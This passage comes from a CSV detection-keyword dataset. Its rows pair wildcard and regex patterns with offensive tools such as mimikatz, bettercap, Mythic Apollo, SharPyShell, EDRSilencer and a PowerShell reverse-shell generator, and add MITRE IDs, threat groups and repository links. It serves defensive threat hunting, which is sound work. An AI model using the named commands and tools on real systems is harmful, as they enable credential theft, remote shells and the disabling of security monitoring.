802.11 - BLE - IPv4 
and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53079" "*net.pipe://*/MakeMeAdmin/Service""*",".{0,1000}net\.pipe\:\/\/.{0,1000}\/MakeMeAdmin\/Service\"".{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","53080" "*net.probe on",".{0,1000}net\.probe\son","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53081" "*net.probe on*",".{0,1000}net\.probe\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53082" "*net.sniff 
*",".{0,1000}net\.sniff\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53083" "*net.sniff.*",".{0,1000}net\.sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53084" "*Net.Sockets.TCPClient*Net.Security.SslStream*AuthenticateAsClient*Invoke-Expression*Out-String*",".{0,1000}Net\.Sockets\.TCPClient.{0,1000}Net\.Security\.SslStream.{0,1000}AuthenticateAsClient.{0,1000}Invoke\-Expression.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","53085" "*net.tcp://*/MakeMeAdmin/Service*",".{0,1000}net\.tcp\:\/\/.{0,1000}\/MakeMeAdmin\/Service.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","53086" "*net::alias*",".{0,1000}net\:\:alias.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53087" "*net::deleg*",".{0,1000}net\:\:deleg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53088" "*net::group*",".{0,1000}net\:\:group.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53089" "*net::if*",".{0,1000}net\:\:if.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53090" "*net::serverinfo*",".{0,1000}net\:\:serverinfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53091" "*net::session*",".{0,1000}net\:\:session.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53092" "*net::share*",".{0,1000}net\:\:share.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53093" "*net::stats*",".{0,1000}net\:\:stats.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53094" "*net::tod*",".{0,1000}net\:\:tod.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53095" "*net::trust*",".{0,1000}net\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53096" "*net::user*",".{0,1000}net\:\:user.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53097" "*net::wsession*",".{0,1000}net\:\:wsession.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53098" "*net_dclist *",".{0,1000}net_dclist\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","53099" "*net_localgroup_member -Group*",".{0,1000}net_localgroup_member\s\-Group.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","53100" "*net_portscan */24*",".{0,1000}net_portscan\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","53101" "*net_portscan.py*",".{0,1000}net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","53102" "*net_recon.*",".{0,1000}net_recon\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53103" "*net1 stop badrv*",".{0,1000}net1\sstop\sbadrv.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53123" "*netbiosX/AMSI-Provider*",".{0,1000}netbiosX\/AMSI\-Provider.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI 
Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","53136" "*netero1010/EDRSilencer*",".{0,1000}netero1010\/EDRSilencer.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","53140" "*netero1010/GhostTask*",".{0,1000}netero1010\/GhostTask.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","53141" "*netero1010/Quser-BOF*",".{0,1000}netero1010\/Quser\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","53142" 
